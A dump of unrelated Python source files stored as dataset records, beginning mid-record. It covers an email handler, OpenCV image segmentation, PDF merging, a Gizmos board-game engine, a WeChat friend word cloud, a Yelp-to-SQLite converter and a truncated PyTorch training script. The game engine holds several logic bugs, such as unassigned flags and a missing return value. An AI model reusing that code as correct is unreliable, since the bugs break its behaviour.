store_email_and_attachment(mail_message,\n\t\t\t\t\t\t\t\t\t\t\tis_from_external=False)\n if not stored_email:\n logging.error(\"Failed to save message: %s\", \n message.original.as_string(True))\n\n\nclass OutboundHandler(webapp.RequestHandler):\n\n def post(self, *args):\n api_key = self.request.headers.get('Authorization')\n \n if api_key != settings['api_key']:\n logging.error(\"Invalid API key: \" + str(api_key))\n self.error(401)\n return\n \n deferred.defer(email, self.request.body, _queue='outbound')\n","sub_path":"outbound.py","file_name":"outbound.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"415576030","text":"import cv2 #disponibiza as funções do opencv \nimport numpy as np\nfrom scipy import misc, ndimage\nfrom skimage import exposure, morphology, img_as_float, filters, util, measure\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport PIL.ImageOps\n\ndef maiorObjeto(grayscaled,threshold):\n \n im_r,tmp = ndimage.label(threshold)\n \n props = measure.regionprops(im_r,grayscaled)\n objMaior = 0\n img_m = 0\n for i in range(0, im_r.max()):\n im_t = np.zeros(im_r.shape)\n \n im_t [im_r == i+1] = 1\n \n \n if props[i].area > objMaior:\n objMaior = props[i].area\n img_m = im_t\n \n return img_m\n\ndef filtroRGB(src,r,g,b):\n if r == 0:\n src[:,:,2] = 0 #elimina o vermelho\n if g == 0:\n src[:,:,1] = 0 #elimina o verde\n if b == 0:\n src[:,:,0] = 0 #elimina o azul\n \ndef show_image(): \n img = cv2.imread('planta2.png')\n \n filtroRGB(img,0,1,0)\n verde_inferior = np.array([0,127,0])\n verde_superior = np.array([255,255,255])\n mascara = cv2.inRange(img, verde_inferior, verde_superior)\n res = cv2.bitwise_and(img,img, mask= mascara) \n\n grayscaled = cv2.cvtColor(res,cv2.COLOR_BGR2GRAY)\n \n median = cv2.medianBlur(grayscaled,3)\n \n retval, threshold = cv2.threshold(median, 10, 255, cv2.THRESH_OTSU)\n \n elemEstr = np.array([[0,1,0],\n [1,1,1],\n [0,1,0]])\n \n kernel3 = np.ones((3,3),np.uint8)\n kernel5 = np.ones((5,5),np.uint8)\n \n #np.ones((3,3))\n selem = morphology.disk(3)\n \n #img_close = morphology.binary_closing(grayscaled, elemEstr)\n #img_top_hat = morphology.white_tophat(img_close,selem)\n \n #img_open = morphology.binary_opening(img_top_hat, elemEstr)\n \n #img_holes = morphology.remove_small_objects(img_open)\n \n \n \n #fechamento\n #transformacion = cv2.morphologyEx(grayscaled,cv2.MORPH_CLOSE,kernel)\n \n #tophat\n #topHat = cv2.morphologyEx(grayscaled,cv2.MORPH_TOPHAT,kernel5)\n \n #abertura\n abertura = cv2.morphologyEx(grayscaled,cv2.MORPH_OPEN,kernel3)\n \n #dilatação\n dilatacao = cv2.dilate(abertura,kernel5,iterations = 1)\n \n #erosao\n erosao = cv2.erode(dilatacao,kernel3,iterations = 1)\n \n #linha\n #img_tra = erosao\n #linha = cv2.dilate(img_tra,kernel3,iterations = 1) - cv2.erode(img_tra,kernel3,iterations = 1)\n \n plt.figure()\n img_print = erosao\n img_maior = maiorObjeto(grayscaled,img_print)\n #plt.imshow(maiorObjeto(grayscaled,img_open))\n misc.imsave('teste.tif',img_print)\n misc.imsave('teste_maior.tif',img_maior)\n \n \n plt.subplot(1, 2, 1)\n plt.imshow(img_print, cmap='gray')\n \n plt.subplot(1, 2, 2)\n plt.imshow(img_maior, cmap='gray')\n\n plt.show()\n \n \ndef main():\n show_image()\n return 0\n \nif __name__ == '__main__':\n main()","sub_path":"Teste2/testeOpenCV.py","file_name":"testeOpenCV.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"160689112","text":"# /usr/bin/python\n# coding=utf-8\n\nfrom pdfrw import PdfReader, PdfWriter\n\n# Путь до автореферата\nsynopsis_path = '../synopsis.pdf'\n# Путь до титульника Научного Доклада ГИА (должно быть две страницы: титульник и пустая)\ngia_title_path = './gia_title.pdf'\n\n\nsynopsis = PdfReader(synopsis_path)\ngia_title = PdfReader(gia_title_path)\n\nsci_rep = PdfWriter()\n\n\nfor i, p in enumerate(synopsis.pages):\n if i < 2:\n sci_rep.addpage(gia_title.pages[i])\n else:\n sci_rep.addpage(p)\n\n\n# Сохранение результата\nsci_rep.write('./sci_rep.pdf')\n\n","sub_path":"gia/make_science_report.py","file_name":"make_science_report.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"459532663","text":"import random\nfrom card import *\nimport itertools\n\nclass Gizmos:\n\tdef __init__(self, card_data, init=True):\n\t\tself.card_data = card_data\n\n\t\tif init:\n\t\t\tself.reset()\n\n\tdef add_to_built(self, card):\n\t\tcard_d = self.card_data.cards[card]\n\t\tself.built_by_eff[card_d.eff] += [card]\n\t\tself.card_vp += card_d.points\n\n\tdef draw_card_from_tier(self, tier):\n\t\tdeck = self.tier_decks[tier]\n\t\tif len(deck) == 0:\n\t\t\treturn None\n\t\tif self.simulation:\n\t\t\tcard_i = random.randint(0, len(deck) - 1)\n\t\t\treturn deck.pop(card_i)\n\t\treturn deck.pop()\n\n\tdef get_random_hidden(self):\n\t\tcumsum = list(itertools.accumulate(self.hidden_marbles))\n\t\trand = random.randint(0, cumsum[-1] - 1)\n\t\tfor i, thres in enumerate(cumsum):\n\t\t\tif rand < thres:\n\t\t\t\treturn i\n\t\traise Exception('out of marbles')\n\n\tdef dispense_marble(self):\n\t\tif self.visible_marble is not None:\n\t\t\tself.pickable_marbles[self.visible_marble] += 1\n\n\t\tcol = self.get_random_hidden()\n\t\tself.visible_marble = col\n\t\tself.hidden_marbles[col] -= 1\n\n\tdef reset(self):\n\t\tself.illegal_move = False\n\t\tself.simulation = False\n\n\t\tself.tier_decks = [[card.idnum for card in cards] for cards in self.card_data.tiers]\n\t\tfor i in range(4):\n\t\t\trandom.shuffle(self.tier_decks[i])\n\t\tself.tier_decks[3] = self.tier_decks[3][:16]\n\n\t\tself.tier_showns = [[], [None, None, None, None], [None, None, None], [None, None]]\n\t\tfor tier in range(4):\n\t\t\tfor i in range(len(self.tier_showns[tier])):\n\t\t\t\tself.tier_showns[tier][i] = self.draw_card_from_tier(tier)\n\n\t\tself.built_by_eff = [[] for eff in CARD_EFFECTS]\n\t\tself.archive = []\n\n\t\tself.hidden_marbles = [13, 13, 13, 13]\n\t\tself.pickable_marbles = [0, 0, 0, 0]\n\t\tself.visible_marble = None\n\n\t\tfor i in range(7):\n\t\t\tself.dispense_marble()\n\n\t\tself.inv_marbles = [0, 0, 0, 0]\n\n\t\tself.marble_cap = 5\n\t\tself.file_cap = 1\n\t\tself.research_cap = 3\n\n\t\tself.card_vp = 0\n\t\tself.vp = 0\n\n\t\tself.add_to_built(self.card_data.tiers[0][0].idnum)\n\n\t\tself.turn = 0\n\t\tself.reset_turn()\n\n\tdef reset_turn(self):\n\t\tself.pending_generic = 1\n\t\tself.pending_picks = 0\n\t\tself.pending_rands = 0\n\t\tself.tapped_by_eff = [[0 for card in cards] for cards in self.built_by_eff]\n\n\tdef sim_clone(self):\n\t\togame = Gizmos(self.card_data, init=False)\n\t\togame.illegal_move = self.illegal_move\n\t\togame.simulation = True\n\t\togame.tier_decks = [deck.copy() for deck in self.tier_decks]\n\t\togame.tier_showns = [showns.copy() for showns in self.tier_showns]\n\t\togame.built_by_eff = [cards.copy() for cards in self.built_by_eff]\n\t\togame.archive = self.archive.copy()\n\t\togame.hidden_marbles = self.hidden_marbles.copy()\n\t\togame.pickable_marbles = self.pickable_marbles.copy()\n\t\togame.visible_marble = self.visible_marble\n\t\togame.inv_marbles = self.inv_marbles.copy()\n\t\togame.marble_cap = self.marble_cap\n\t\togame.file_cap = self.file_cap\n\t\togame.research_cap = self.research_cap\n\t\togame.card_vp = self.card_vp\n\t\togame.vp = self.vp\n\t\togame.turn = self.turn\n\t\togame.pending_generic = self.pending_generic\n\t\togame.pending_picks = self.pending_picks\n\t\togame.pending_rands = self.pending_rands\n\t\togame.tapped_by_eff = [tapped.copy() for tapped in self.tapped_by_eff]\n\t\treturn ogame\n\n\tdef get_i_card_tapped_it(self, eff):\n\t\t# note that tapped might be shorter than built if a card is\n\t\t# just built -- ignore that card in this iterator\n\t\treturn enumerate(zip(self.built_by_eff[eff], self.tapped_by_eff[eff]))\n\n\tdef card_has_effcol(self, card, col):\n\t\tcard_d = self.card_data.cards[card]\n\t\treturn (card_d.effcol1 is not None and card_d.effcol1 == col) or (card_d.effcol2 is not None and card_d.effcol2 == col)\n\n\t# API\n\tdef new_turn(self):\n\t\tself.reset_turn()\n\t\tself.turn += 1\n\n\tdef can_pick(self, col):\n\t\treturn self.pickable_marbles[col] > 0\n\n\tdef pick_is_legal(self, col):\n\t\tif self.pending_generic <= 0 and self.pending_picks <= 0:\n\t\t\treturn False\n\t\tif sum(self.inv_marbles) >= self.marble_cap:\n\t\t\treturn False\n\t\tif self.pickable_marbles[col] <= 0:\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef pick(self, col):\n\t\tif not self.pick_is_legal(col):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tif self.pending_picks == 0:\n\t\t\tself.pending_generic -= 1\n\t\telse:\n\t\t\tself.pending_picks -= 1\n\n\t\tself.pickable_marbles[col] -= 1\n\t\tself.dispense_marble()\n\t\tself.inv_marbles[col] += 1\n\n\t\tp2r_i = CARD_EFFECTS.index('p2r')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(p2r_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_rands += 1\n\t\t\t\tself.tapped_by_eff[p2r_i][i] += 1\n\n\t\tpp2r_i = CARD_EFFECTS.index('pp2r')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(pp2r_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_rands += 1\n\t\t\t\tself.tapped_by_eff[pp2r_i][i] += 1\n\n\tdef draw_marble_is_legal(self):\n\t\t# assume there are enough marbles to draw\n\t\tif self.pending_rands <= 0:\n\t\t\treturn False\n\t\tif sum(self.inv_marbles) >= self.marble_cap:\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef draw_marble(self):\n\t\tif not self.draw_marble_is_legal():\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_rands -= 1\n\n\t\tcol = self.get_random_hidden()\n\t\tself.hidden_marbles[col] -= 1\n\t\tself.inv_marbles[col] += 1\n\n\tdef file_shown_is_legal(self, tier, index):\n\t\tif self.pending_generic <= 0:\n\t\t\treturn False\n\t\tif self.tier_showns[tier][index] is None:\n\t\t\treturn False\n\t\tif len(self.archive) >= self.file_cap:\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef file_shown(self, tier, index):\n\t\tif not self.file_shown_is_legal(tier, index):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_generic -= 1\n\n\t\tself.file_card(self.tier_showns[tier][index])\n\n\tdef file_card(self, card_to_file):\n\t\tf2p_i = CARD_EFFECTS.index('f2p')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(f2p_i):\n\t\t\tif tapped < 1:\n\t\t\t\tself.pending_picks += 1\n\t\t\t\tself.tapped_by_eff[f2p_i][i] += 1\n\n\t\tf2r_i = CARD_EFFECTS.index('f2r')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(f2r_i):\n\t\t\tif tapped < 1:\n\t\t\t\tself.pending_rands += 1\n\t\t\t\tself.tapped_by_eff[f2r_i][i] += 1\n\n\t\tcard = card_to_file\n\n\t\tself.archive += [card]\n\n\tdef can_build(self, card):\n\t\tcard_d = self.card_data.cards[card]\n\t\treturn self.inv_marbles[card_d.col] >= card_d.cost\n\n\tdef build(self, card_to_build):\n\t\tcard_d = self.card_data.cards[card_to_build]\n\t\tcol = card_d.col\n\n\t\tb2p_i = CARD_EFFECTS.index('b2p')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(b2p_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_picks += 1\n\t\t\t\tself.tapped_by_eff[b2p_i][i] += 1\n\n\t\tbb2p_i = CARD_EFFECTS.index('bb2p')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(bb2p_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_picks += 1\n\t\t\t\tself.tapped_by_eff[bb2p_i][i] += 1\n\n\t\tb2v_i = CARD_EFFECTS.index('b2v')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(b2v_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.vp += 1\n\t\t\t\tself.tapped_by_eff[b2v_i][i] += 1\n\n\t\tbb2v_i = CARD_EFFECTS.index('bb2v')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(bb2v_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.vp += 1\n\t\t\t\tself.tapped_by_eff[bb2v_i][i] += 1\n\n\t\tcard = card_to_build\n\n\t\tself.inv_marbles[card_d.col] -= card_d.cost\n\t\tself.add_to_built(card)\n\t\tif card_d.eff == CARD_EFFECTS.index('upg110'):\n\t\t\tself.marble_cap += 1\n\t\t\tself.file_cap += 1\n\t\tif card_d.eff == CARD_EFFECTS.index('upg101'):\n\t\t\tself.marble_cap += 1\n\t\t\tself.research_cap += 1\n\t\tif card_d.eff == CARD_EFFECTS.index('upg212'):\n\t\t\tself.marble_cap += 2\n\t\t\tself.file_cap + 1\n\t\t\tself.research_cap += 2\n\n\tdef build_from_file_is_legal(self, index):\n\t\tif self.pending_generic <= 0:\n\t\t\treturn False\n\t\tif index >= len(self.archive):\t\n\t\t\treturn False\n\t\tif not self.can_build(self.archive[index]):\n\t\t\treturn False\n\n\t# API\n\tdef build_from_file(self, index):\n\t\tif not self.build_from_file_is_legal(index):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_generic -= 1\n\n\t\tbff2pp_i = CARD_EFFECTS.index('bff2pp')\n\t\tfor i in range(len(self.built_by_eff[bff2pp_i])):\n\t\t\tcard = self.built_by_eff[bff2pp_i][i]\n\t\t\tif self.tapped_by_eff[bff2pp_i][i] < 1:\n\t\t\t\tself.pending_picks += 2\n\t\t\t\tself.tapped_by_eff[bff2pp_i][i] += 1\n\n\t\tbuild(self.archive.pop(index))\n\n\tdef build_from_shown_is_legal(self, tier, index):\n\t\tif self.pending_generic <= 0:\n\t\t\treturn False\n\t\tif self.tier_showns[tier][index] is None:\n\t\t\treturn False\n\t\tif not self.can_build(self.tier_showns[tier][index]):\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef build_from_shown(self, tier, index):\n\t\tif not self.build_from_shown_is_legal(tier, index):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_generic -= 1\n\n\t\tself.build(self.tier_showns[tier][index])\n\t\tself.tier_showns[tier][index] = self.draw_card_from_tier(tier)\n\n\tdef get_legal_moves(self):\n\t\tlegal_moves = []\n\n\t\tlegal_moves += [Move(MOVE_TYPES.index('new_turn'))]\n\t\tif self.draw_marble_is_legal():\n\t\t\tlegal_moves += [Move(MOVE_TYPES.index('draw_marble'))]\n\t\tfor i in range(4):\n\t\t\tif self.pick_is_legal(i):\n\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('pick'), col=i)]\n\t\tfor tier in range(4):\n\t\t\tfor i in range(len(self.tier_showns[tier])):\n\t\t\t\tif self.file_shown_is_legal(tier, i):\n\t\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('file_shown'), tier=tier, index=i)]\n\t\t\t\tif self.build_from_shown_is_legal(tier, i):\n\t\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('build_from_shown'), tier=tier, index=i)]\n\t\tfor i in range(len(self.archive)):\n\t\t\tif self.build_from_file_is_legal(i):\n\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('build_from_file'), index=i)]\n\t\treturn legal_moves\n\n\t# get the card built by the move\n\tdef get_move_build(self, move):\n\t\tcard = None\n\t\tif move.move_type == MOVE_TYPES.index('build_from_file'):\n\t\t\tcard = self.archive[move.index]\n\t\tif move.move_type == MOVE_TYPES.index('build_from_shown'):\n\t\t\tcard = self.tier_showns[move.tier][move.index]\n\t\tif card is None:\n\t\t\treturn None\n\t\treturn self.card_data.cards[card]\n\n\tdef run_move(self, move, check_illegal=True):\n\t\tif move.move_type == MOVE_TYPES.index('new_turn'):\n\t\t\tself.new_turn()\n\t\telif move.move_type == MOVE_TYPES.index('draw_marble'):\n\t\t\tself.draw_marble()\n\t\telif move.move_type == MOVE_TYPES.index('pick'):\n\t\t\tself.pick(move.col)\n\t\telif move.move_type == MOVE_TYPES.index('file_shown'):\n\t\t\tself.file_shown(move.tier, move.index)\n\t\telif move.move_type == MOVE_TYPES.index('build_from_file'):\n\t\t\tself.build_from_file(move.index)\n\t\telif move.move_type == MOVE_TYPES.index('build_from_shown'):\n\t\t\tself.build_from_shown(move.tier, move.index)\n\n\t\tif check_illegal and self.illegal_move:\n\t\t\traise Exception('tried to run an illegal move')\n\n\tdef calc_score(self):\n\t\treturn self.vp + self.card_vp\n\nMOVE_TYPES = [\n\t'new_turn',\n\t'draw_marble',\n\t'pick',\n\t'file_shown',\n\t'build_from_file',\n\t'build_from_shown'\n]\nclass Move:\n\tdef __init__(self, move_type, col=None, tier=None, index=None):\n\t\tself.move_type = move_type\n\t\tself.col = col\n\t\tself.tier = tier\n\t\tself.index = index\n","sub_path":"gizmos.py","file_name":"gizmos.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461247355","text":"import itchat\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nfrom wordcloud import WordCloud\nimport api\nimport jieba\n\nmy_font = '/Library/Fonts/songti.ttc'\nitchat.auto_login()\n\ndef friends_set(name_set, signature_set):\n\n friend_list = itchat.get_friends(update=True)[0:]\n for friend in friend_list:\n name_set.append(friend['NickName'])\n if friend['Signature']:\n signature_set.append(friend['Signature'])\n\ndef show_cloud(set):\n\n text = ''.join(set)\n wordlist = jieba.cut(text, cut_all=True)\n word_space_split = \" \".join(wordlist)\n\n pb_mask = np.array(Image.open(\"pic.jpg\"))\n wc = WordCloud(font_path=my_font,\n background_color=\"white\", max_font_size=100,\n min_font_size=38,max_words=5000, mask=pb_mask,scale=1)\n wc.generate(word_space_split)\n plt.figure(figsize=(55, 55))\n plt.imshow(wc, interpolation=\"bilinear\")\n plt.axis(\"off\")\n plt.show()","sub_path":"day58-60/day2-3/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"402202950","text":"import json\nimport sqlite3\nimport time\n\n\"\"\"\nAuthor: Shih-Ting Huang (sh3964)\n\nConvert business.json to Business table in yelp.db\n\"\"\"\n\n\nclass Hours:\n __slots__ = 'jsonDict', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict['hours']\n self.Monday = self.jsonDict['Monday'] if 'Monday' in self.jsonDict else None\n self.Tuesday = self.jsonDict['Tuesday'] if 'Tuesday' in self.jsonDict else None\n self.Wednesday = self.jsonDict['Wednesday'] if 'Wednesday' in self.jsonDict else None\n self.Thursday = self.jsonDict['Thursday'] if 'Thursday' in self.jsonDict else None\n self.Friday = self.jsonDict['Friday'] if 'Friday' in self.jsonDict else None\n self.Saturday = self.jsonDict['Saturday'] if 'Saturday' in self.jsonDict else None\n self.Sunday = self.jsonDict['Sunday'] if 'Sunday' in self.jsonDict else None\n\n\nclass BizType:\n __slot__ = 'jsonDict', 'biz_type'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict['categories']\n related_type = ['Restaurants', 'Food', 'Diners']\n self.biz_type = 0\n for x in related_type:\n # found! break the search\n if x in self.jsonDict:\n self.biz_type = 1\n break\n # if 'Restaurants' in self.jsonDict or 'Food' in self.jsonDict or 'Diners' in self.jsonDict:\n # self.biz_type = 1\n # else:\n # self.biz_type = 0\n\n\nclass Attributes:\n __slots__ = 'jsonDict', 'goodForGroup', 'goodForKids', 'wheelchair', 'noiseLevel', 'alcohol', \\\n 'takeOut', 'reservation', 'delivery', 'hasTV', 'wifi', 'priceLevel', 'creditCard'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict\n # print(self.jsonDict)\n attributes = ['RestaurantsGoodForGroups', 'GoodForKids', 'NoiseLevel', 'Alcohol', 'RestaurantsTakeOut',\n 'RestaurantsReservations', 'BusinessAcceptsCreditCards', 'RestaurantsDelivery', 'HasTV',\n 'RestaurantsPriceRange2', 'WiFi', 'WheelchairAccessible']\n default = None\n try:\n self.goodForGroup = self.jsonDict['RestaurantsGoodForGroups']\n except KeyError:\n self.goodForGroup = default\n\n try:\n self.goodForKids = self.jsonDict['GoodForKids']\n except KeyError:\n self.goodForKids = default\n\n try:\n self.wheelchair = self.jsonDict['WheelchairAccessible']\n except KeyError:\n self.wheelchair = default\n\n try:\n self.noiseLevel = self.jsonDict['NoiseLevel']\n except KeyError:\n self.noiseLevel = default\n\n try:\n self.alcohol = self.jsonDict['Alcohol']\n except KeyError:\n self.alcohol = default\n\n try:\n self.takeOut = self.jsonDict['RestaurantsTakeOut']\n except KeyError:\n self.takeOut = default\n\n try:\n self.reservation = self.jsonDict['RestaurantsReservations']\n except KeyError:\n self.reservation = default\n\n try:\n self.delivery = self.jsonDict['RestaurantsDelivery']\n except KeyError:\n self.delivery = default\n\n try:\n self.hasTV = self.jsonDict['HasTV']\n except KeyError:\n self.hasTV = default\n\n try:\n self.wifi = self.jsonDict['WiFi']\n except KeyError:\n self.wifi = default\n\n try:\n self.priceLevel = self.jsonDict['RestaurantsPriceRange2']\n except KeyError:\n self.priceLevel = default\n\n try:\n self.creditCard = self.jsonDict['BusinessAcceptsCreditCards']\n except KeyError:\n self.creditCard = default\n\n\nclass Business:\n __slots__ = 'jsonDict', 'name', 'business_id', 'postal_code', 'is_open', 'hours', 'stars', 'state', 'city', \\\n 'categories', 'neighborhood', 'longitude', 'attributes', 'review_count', 'address', 'latitude'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict\n self.categories = BizType(json_dict)\n if self.categories.biz_type == 1:\n self.name = json_dict['name']\n self.business_id = json_dict['business_id']\n # p_code = str(json_dict['postal_code']).split(' ')\n # if len(p_code) > 1:\n # self.postal_code = p_code[0] + '_' + p_code[1]\n # else:\n #\n self.postal_code = json_dict['postal_code']\n self.is_open = json_dict['is_open']\n self.stars = json_dict['stars']\n self.state = json_dict['state']\n self.city = json_dict['city']\n self.neighborhood = json_dict['neighborhood']\n self.longitude = json_dict['longitude']\n # self.attributes = str(json_dict['attributes'])\n self.attributes = Attributes(json_dict['attributes'])\n self.review_count = json_dict['review_count']\n self.address = json_dict['address']\n self.latitude = json_dict['latitude']\n self.hours = Hours(json_dict)\n\n def save_to_database(self):\n con = sqlite3.connect(\"business.db\")\n with con:\n cur = con.cursor()\n con.row_factory = sqlite3.Row\n cur.execute(\n \"INSERT INTO Business(\"\n\n \"name,\"\n \"business_id,\"\n \"neighborhood,\"\n \"address,\"\n \"city,\"\n\n \"state,\"\n \"postal_code,\"\n \"latitude,\"\n \"longitude,\"\n \"stars,\"\n\n \"review_count,\"\n \"is_open,\"\n # \"attributes,\"\n \"categories,\"\n # \"hours,\"\n\n \"goodForGroup,\"\n \"goodForKids,\"\n \"wheelchair,\"\n \"noiseLevel,\"\n \"alcohol,\"\n\n \"takeOut,\"\n \"reservation,\"\n \"delivery,\"\n \"hasTV,\"\n \"wifi,\"\n\n \"priceLevel,\"\n \"creditCard,\"\n\n \"monday,\"\n \"tuesday,\"\n \"wednesday,\"\n \"thursday,\"\n \"friday,\"\n \"saturday,\"\n \"sunday\"\n\n \") VALUES (\"\n \"?,?,?,?,?,\"\n \"?,?,?,?,?,\"\n \"?,?,?,\"\n \"?,?,?,?,?,\"\n \"?,?,?,?,?,\"\n \"?,?,\"\n \"?,?,?,?,?,?,?)\",\n\n (\n self.name,\n self.business_id,\n self.neighborhood,\n self.address,\n self.city,\n self.state,\n self.postal_code,\n self.latitude,\n self.longitude,\n self.stars,\n self.review_count,\n self.is_open,\n # self.attributes,\n self.categories.biz_type,\n\n # attributes\n self.attributes.goodForGroup,\n self.attributes.goodForKids,\n self.attributes.wheelchair,\n self.attributes.noiseLevel,\n self.attributes.alcohol,\n self.attributes.takeOut,\n self.attributes.reservation,\n self.attributes.delivery,\n self.attributes.hasTV,\n self.attributes.wifi,\n self.attributes.priceLevel,\n self.attributes.creditCard,\n\n # self.hours,\n self.hours.Monday,\n self.hours.Tuesday,\n self.hours.Wednesday,\n self.hours.Thursday,\n self.hours.Friday,\n self.hours.Saturday,\n self.hours.Sunday\n )\n\n )\n\n\ndef main():\n data = []\n with open('business.json') as f:\n for line in f:\n data.append(json.loads(line))\n start = time.time()\n for case in data:\n this_case = Business(case)\n if this_case.categories.biz_type == 1:\n this_case.save_to_database()\n end = time.time()\n print('Time:', end - start)\n\nif __name__ == '__main__':\n main()\n","sub_path":"convert_business.py","file_name":"convert_business.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"121691249","text":"# -*- coding: utf-8 -*-\n# @Author: lidong\n# @Date: 2018-03-18 13:41:34\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-10-22 16:27:40\nimport sys\nimport torch\nimport visdom\nimport argparse\nimport numpy as np\nimport time\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\n\nfrom torch.autograd import Variable\nfrom torch.utils import data\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nfrom cmf.models import get_model\nfrom cmf.loader import get_loader, get_data_path\nfrom cmf.loss import *\nimport os\n\ndef train(args):\n torch.backends.cudnn.benchmark=True\n # Setup Augmentations\n loss_rec=[0]\n best_error=2\n # Setup Dataloader\n data_loader = get_loader(args.dataset)\n data_path = get_data_path(args.dataset)\n t_loader = data_loader(data_path, is_transform=True,\n split='train', img_size=(args.img_rows, args.img_cols))\n v_loader = data_loader(data_path, is_transform=True,\n split='test', img_size=(args.img_rows, args.img_cols))\n\n trainloader = data.DataLoader(\n t_loader, batch_size=args.batch_size, num_workers=4, shuffle=True)\n valloader = data.DataLoader(\n v_loader, batch_size=args.batch_size, num_workers=4)\n\n\n # Setup visdom for visualization\n if args.visdom:\n vis = visdom.Visdom(env='sceneflow')\n # old_window = vis.line(X=torch.zeros((1,)).cpu(),\n # Y=torch.zeros((1)).cpu(),\n # opts=dict(xlabel='minibatches',\n # ylabel='Loss',\n # title='Trained Loss',\n # legend=['Loss']))\n loss_window = vis.line(X=torch.zeros((1,)).cpu(),\n Y=torch.zeros((1)).cpu(),\n opts=dict(xlabel='minibatches',\n ylabel='Loss',\n title='Training Loss',\n legend=['Loss']))\n pre_window = vis.image(\n np.random.rand(256, 512),\n opts=dict(title='predict!', caption='predict.'),\n )\n ground_window = vis.image(\n np.random.rand(256, 512),\n opts=dict(title='ground!', caption='ground.'),\n )\n image_window = vis.image(\n np.random.rand(256, 512),\n opts=dict(title='image!', caption='image.'),\n )\n # Setup Model\n model = get_model(args.arch)\n # parameters=model.named_parameters()\n # for name,param in parameters:\n # print(name)\n # print(param.grad)\n # exit()\n\n model = torch.nn.DataParallel(\n model, device_ids=range(torch.cuda.device_count()))\n #model = torch.nn.DataParallel(model, device_ids=[0])\n model.cuda()\n\n # Check if model has custom optimizer / loss\n # modify to adam, modify the learning rate\n optimizer = torch.optim.Adam(\n model.parameters(), lr=args.l_rate,betas=(0.9,0.999))\n # optimizer = torch.optim.SGD(\n # model.parameters(), lr=args.l_rate,momentum=0.90, weight_decay=5e-5)\n # optimizer = torch.optim.Adam(\n # model.parameters(), lr=args.l_rate,weight_decay=5e-4,betas=(0.9,0.999),amsgrad=True)\n loss_fn = l1\n trained=0\n scale=100\n\n if args.resume is not None:\n if os.path.isfile(args.resume):\n print(\"Loading model and optimizer from checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n #model_dict=model.state_dict() \n #opt=torch.load('/home/lidong/Documents/cmf/cmf/exp1/l2/sgd/log/83/rsnet_nyu_best_model.pkl')\n model.load_state_dict(checkpoint['model_state'])\n optimizer.load_state_dict(checkpoint['optimizer_state'])\n #opt=None\n print(\"Loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n trained=checkpoint['epoch']\n #trained=0\n \n else:\n print(\"No checkpoint found at '{}'\".format(args.resume))\n print('Initialize from resnet34!')\n resnet34=torch.load('/home/lidong/Documents/CMF/20_bilinear_cmf_flying3d_best_model.pkl')\n #optimizer.load_state_dict(resnet34['optimizer_state'])\n #model\n #model.load_state_dict(resnet34['state_dict'])\n model_dict=model.state_dict() \n pre_dict={k: v for k, v in resnet34['model_state'].items() if k in model_dict}\n # print(pre_dict)\n # exit()\n # for k,v in resnet34['state_dict'].items():\n # #print('.'.join(k.split('.')[1:]))\n # print(k)\n # for k,v in model_dict.items():\n # print(k)\n model_dict.update(pre_dict)\n model.load_state_dict(model_dict)\n #optimizer\n # opti_dict=optimizer.state_dict()\n # pre_dict={k: v for k, v in resnet34['optimizer_state'].items() if k in opti_dict}\n # # for k,v in pre_dict.items():\n # # print(k)\n # # if k=='state':\n 